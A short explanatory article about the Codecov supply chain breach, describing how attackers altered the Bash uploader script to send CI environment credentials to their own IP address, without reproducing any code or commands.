How did the hackers gain access to Codecov?
Hackers, the actors that remain unknown, gained access due to a vulnerability in Codecov’s Docker image creation process. The vulnerability allowed the threat actor to modify the script by extracting the credentials required.
This is the result of unauthorized alterations that had taken place in the script by a third party. The periodic alterations enabled the attackers to export information from customers’ continuous integration (CI) environments.
The code audit platform makes use of a Bash uploader that detects the environment, gathers reports, and uploads them to Codecov. The issue occurred as hackers were able to extract sensitive credentials such as environment variables containing keys, credentials, and tokens by modifying the Bash uploader script.
In fact, the attackers had replaced the Codecov’s IP address with their own IP in the Bash Uploader script:
This phenomenon of infiltrating the key suppliers or vendors’ vulnerabilities to gain access to the primary target is called a supply chain attack – one that is prevalent and is evolving faster than businesses’ detection and prevention efforts.